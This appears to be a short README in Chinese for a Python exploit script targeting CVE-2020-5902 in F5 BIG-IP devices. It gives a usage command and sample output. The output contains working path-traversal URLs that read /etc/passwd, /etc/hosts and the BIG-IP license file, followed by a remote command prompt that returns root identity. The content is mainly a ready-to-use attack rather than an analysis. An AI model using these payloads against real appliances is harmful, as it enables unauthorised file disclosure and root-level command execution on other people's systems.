用于检查 CVE-2020-5902(F5 BIG-IP 设备)的 Python 脚本。
python3 CVE-2020-5902.py -i <IP>
- 用于检查 CVE-2020-5902(F5 BIG-IP 设备)的 Python 脚本。 | 由 Abdullah AlZahrani 编写
[!] 你的目标:127.0.0.1
[I] /etc/passwd 可读
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
[I] /etc/hosts 可读
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
[I] /config/bigip.license 可读
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
[I] 目标存在 CVE-2020-5902 漏洞
[*] 检查目标是否存在 RCE 漏洞
[#] 目标存在 RCE 漏洞,开始吧。
Command > id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0